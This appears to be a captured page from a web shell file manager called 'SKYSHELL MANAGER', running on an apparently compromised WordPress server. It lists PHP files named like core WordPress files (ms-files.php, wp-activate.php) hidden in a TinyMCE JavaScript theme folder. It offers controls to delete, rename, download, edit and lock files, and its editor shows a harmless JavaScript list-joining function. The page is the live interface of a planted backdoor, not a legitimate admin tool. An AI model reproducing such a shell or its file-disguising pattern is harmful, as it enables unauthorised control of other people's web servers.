📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
cstage
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
ms-files.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: index.js
/** * Join `arr` with the trailing `str` defaulting to "and", * and `sep` string defaulting to ", ". * * @param {Array} arr * @param {String} str * @param {String} sep * @return {String} * @api public */ module.exports = function(arr, str, sep){ str = str || 'and'; sep = sep || ', '; if (arr.length < 2) return arr[0] || ''; var oxford = str.slice(0, 2) === sep; if (!oxford) { str = ' ' + str; } else if (arr.length == 2) { str = str.slice(1); } return arr.slice(0, -1).join(sep) + str + ' ' + arr[arr.length - 1]; };
Save